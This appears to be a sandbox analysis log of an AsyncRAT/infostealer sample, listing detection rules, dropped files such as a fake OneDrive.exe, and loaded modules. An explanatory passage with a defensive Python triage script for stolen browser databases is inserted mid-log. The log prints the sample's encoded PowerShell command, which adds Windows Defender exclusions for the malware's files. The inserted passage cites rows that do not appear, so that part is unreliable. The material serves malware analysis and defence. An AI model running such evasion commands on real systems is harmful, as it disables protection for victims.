Source: b39wW3jYKO.exe, 00000000.00000000.2129581146.0000014180441000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameOneDrive.exe2 vs b39wW3jYKO.exe
Source: b39wW3jYKO.exe | Binary or memory string: OriginalFilenameOneDrive.exe2 vs b39wW3jYKO.exe
Source: 0.2.b39wW3jYKO.exe.1419b110000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifacts associated with disabling Windows Defender
Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifacts associated with disabling Windows Defender
Source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.4647563742.000001419B000000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.4648624073.000001419B110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifacts associated with disabling Windows Defender
Source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.4636065933.000001419257D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: b39wW3jYKO.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: OneDrive.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: arndry.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: arndry.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: arndry.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
Source: arndry.exe.0.dr, Settings.cs | Base64 encoded string: 'ko4cJ6jZSRXGOzxb+X/XIypASEw9BMK4sxdQOppaCJiDJRjXWttzrtDR1WmRtFf1', 'UiWEarYOsqLo292Ez/XbQx9AfwVWFkGbdqSTgDuOJUV/fmusAQ9KdH+sVpZFgy1v', 'NBW9o6+cDOocLnfX9iRvSMNwH7/BNABTq1jCY0Bc7D4xYvJbFZ1qoE/Qm2R+f6VP'
Source: arndry.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: arndry.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, Helper.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, Helper.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, Botkiller.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, Botkiller.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/26@1/2
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD3492952A AdjustTokenPrivileges
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File created: C:\Users\user\documents\OneDrive.exe
Source: C:\Users\user\Documents\OneDrive.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Mutant created: \Sessions\1\BaseNamedObjects\Tohcrtzmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Mutant created: \Sessions\1\BaseNamedObjects\QMHDjhLW52nOcp4a
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3804
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Mutant created: \Sessions\1\BaseNamedObjects\rizvP2PbycXS0qc6
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File created: C:\Users\user\AppData\Local\Temp\arndry.exe
Source: b39wW3jYKO.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: b39wW3jYKO.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tmp1DE4.tmp.dat.0.dr, tmp8A59.tmp.dat.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
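The CREATE TABLE password_notes statement in the row above is the schema of a Chromium "Login Data" database, and the search-engine URLs listed earlier for tmpE9CD.tmp.dat / tmp8A2A.tmp.dat match the keywords table of a Chromium "Web Data" database: stealers of this kind copy the browser's locked profile databases to a temporary file and read them from there, which is why browser SQL and bookmark strings turn up inside the sample's dropped tmp*.tmp.dat files. The Python below is an added triage example, not code from the report or from the sample. It checks whether a dropped file is an SQLite database, classifies it by the tables it contains, and for a Login Data copy lists what a stealer would pull from it (origin, username, size of the encrypted password blob, number of attached password notes). The sample files it builds are constructed for the demonstration; the password blobs are placeholders carrying only the "v10" prefix, not real DPAPI/AES-GCM ciphertext. That the report's .tmp.dat files are such copies is this example's assumption, suggested by the strings but not stated by the report.

```python
import os
import sqlite3
import tempfile
from pathlib import Path

SQLITE_MAGIC = b"SQLite format 3\x00"

# Tables that identify the browser databases an infostealer typically copies
# out of a profile. password_notes is the schema quoted in the report; the
# other names are the standard Chromium and Firefox table names.
SIGNATURES = {
    "Chromium Login Data": {"logins", "password_notes"},
    "Chromium Web Data": {"keywords"},
    "Firefox places.sqlite": {"moz_places", "moz_bookmarks"},
}


def _open_readonly(path):
    # Open the copy read-only so triage never modifies the evidence file.
    return sqlite3.connect(Path(path).resolve().as_uri() + "?mode=ro", uri=True)


def is_sqlite(path):
    with open(path, "rb") as fh:
        return fh.read(16) == SQLITE_MAGIC


def table_names(path):
    con = _open_readonly(path)
    try:
        return {row[0] for row in con.execute(
            "SELECT name FROM sqlite_master WHERE type = 'table'")}
    finally:
        con.close()


def classify_db(path):
    """Name the browser database kind, 'SQLite (unrecognised schema)', or None if not SQLite."""
    if not is_sqlite(path):
        return None
    names = table_names(path)
    for kind, required in SIGNATURES.items():
        if required <= names:
            return kind
    return "SQLite (unrecognised schema)"


def login_data_summary(path):
    """For a Login Data copy: (origin, username, encrypted password length, note count) per login."""
    con = _open_readonly(path)
    try:
        return con.execute(
            "SELECT l.origin_url, l.username_value, length(l.password_value), count(n.id) "
            "FROM logins l LEFT JOIN password_notes n ON n.parent_id = l.id "
            "GROUP BY l.id ORDER BY l.id").fetchall()
    finally:
        con.close()


def build_samples(directory=None):
    """Construct sample files for the demonstration (placeholder data, not real browser profiles)."""
    directory = directory or tempfile.mkdtemp(prefix="browserdb_triage_")
    login = os.path.join(directory, "tmpA.tmp.dat")
    con = sqlite3.connect(login)
    con.executescript("""
        CREATE TABLE logins (id INTEGER PRIMARY KEY AUTOINCREMENT, origin_url VARCHAR NOT NULL,
            username_value VARCHAR, password_value BLOB);
        CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL
            REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED,
            key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER,
            UNIQUE (parent_id, key));
        -- X'763130...' is the 'v10' prefix Chromium puts on its AES-GCM blobs, padded with zeros
        INSERT INTO logins (origin_url, username_value, password_value)
            VALUES ('https://mail.example.test/login', 'alice', X'76313000000000000000'),
                   ('https://bank.example.test/', 'bob', X'76313000000000000000');
        INSERT INTO password_notes (parent_id, key, value, date_created, confidential)
            VALUES (1, '', X'763130', 0, 1);
    """)
    con.commit()
    con.close()
    webdata = os.path.join(directory, "tmpB.tmp.dat")
    con = sqlite3.connect(webdata)
    con.executescript(
        "CREATE TABLE keywords (id INTEGER PRIMARY KE, short_name VARCHAR, url VARCHAR);"
        .replace("PRIMARY KE,", "PRIMARY KEY,") +
        "INSERT INTO keywords VALUES (1, 'DuckDuckGo', 'https://duckduckgo.com/?q={searchTerms}');")
    con.commit()
    con.close()
    other = os.path.join(directory, "tmpC.tmp.dat")
    with open(other, "wb") as fh:
        fh.write(b"not a database\n")
    return {"login_data": login, "web_data": webdata, "other": other}


def triage(paths):
    return [(os.path.basename(p), classify_db(p)) for p in paths]


if __name__ == "__main__":
    samples = build_samples()
    for name, kind in triage(samples.values()):
        print(f"{name}: {kind}")
    for row in login_data_summary(samples["login_data"]):
        print("  login:", row)
```

Run it against the files a sandbox exported as dropped (.dr) artifacts to tell real profile copies apart from other temp files; the password_value blobs in a copy are still DPAPI/AES-GCM protected, so the summary shows what was taken, not the plaintext.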
Source: b39wW3jYKO.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File read: C:\Users\user\Desktop\b39wW3jYKO.exe
Source: unknown | Process created: C:\Users\user\Desktop\b39wW3jYKO.exe "C:\Users\user\Desktop\b39wW3jYKO.exe"
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Users\user\Documents\OneDrive.exe "C:\Users\user\Documents\OneDrive.exe"
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Process created: C:\Users\user\AppData\Local\Temp\arndry.exe "C:\Users\user\AppData\Local\Temp\arndry.exe"
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3804 -s 1632
Source: unknown | Process created: C:\Users\user\Documents\OneDrive.exe "C:\Users\user\Documents\OneDrive.exe"
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Process created: C:\Users\user\AppData\Local\Temp\arndry.exe "C:\Users\user\AppData\Local\Temp\arndry.exe"
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Section loaded: vaultcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: dhcpcsvc.dllJump to behavior
